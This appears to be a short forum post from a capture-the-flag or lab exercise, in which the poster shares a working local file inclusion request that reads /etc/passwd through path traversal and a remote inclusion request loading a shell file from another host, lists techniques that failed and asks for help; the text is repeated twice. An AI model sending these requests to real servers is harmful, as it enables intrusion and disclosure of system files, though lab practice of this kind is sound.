April 3, 2022 at 2:35 AM
Working LFI
GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1
RFI works too but no execution
GET /index.php?page=http://10.10.x.y/shell.html
no proc/self/environ access
no prof/self/fd access
no php wrappers
log poisoning doesn't appear to work (nginx + php) there is fact cgi but seems protected there too.
anyone?
GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1
RFI works too but no execution
GET /index.php?page=http://10.10.x.y/shell.html
no proc/self/environ access
no prof/self/fd access
no php wrappers
log poisoning doesn't appear to work (nginx + php) there is fact cgi but seems protected there too.
anyone?

